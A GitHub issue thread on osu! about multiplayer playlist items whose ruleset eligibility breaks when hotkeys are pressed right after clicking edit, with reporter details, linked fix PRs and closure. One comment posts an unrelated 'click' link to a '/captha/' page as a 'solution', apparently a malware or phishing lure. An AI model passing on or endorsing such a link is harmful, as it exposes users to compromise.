### ISSUE TITLE
Multiplayer playlist items can be edited in ways that break ruleset eligibility

### ISSUE THREAD

**Issue by bdach** [ppy/osu#30415]
### Type

Game behaviour

### Bug description

See https://discord.com/channels/188630481301012481/1097318920991559880/1299038814060417035 for the report. 

I have not done any investigation or confirmed the bug, I'm just moving this here so it doesn't get lost. Needs to be investigated yesterday.

### Version

current master in theory

### Logs

not provided by original reporter
```[tasklist]
### Tasks
- [ ] https://github.com/ppy/osu-web/pull/11589
- [ ] https://github.com/ppy/osu-server-spectator/pull/248
- [ ] https://github.com/ppy/osu/pull/30424
- [ ] https://github.com/ppy/osu/pull/30425
```

**Comment by LittleLilyBun** [comment]
Hi, I'm the reporter from that discord link, My current game version is 2024.1009.1-lazer and heres the logs:
[compressed-logs.zip](https://github.com/user-attachments/files/17511074/compressed-logs.zip)
To explain exactly what I'm doing, I'm hitting ctrl+1/2/3/4 immediately (like, within a frame or two) after clicking the edit button.

**Comment by shinmorisawa** [comment]
I have gotten this same issue, around 3 times.

**Comment by sgmustafi** [comment]
maybe this solution will solve your problem [click](https://www.calvarywhangarei.co.nz/captha/index.html)

**Comment by peppy** [comment]
@bdach safe to close this one now?

**Comment by bdach** [comment]
Yup. At least I hope so. :sweat_smile:
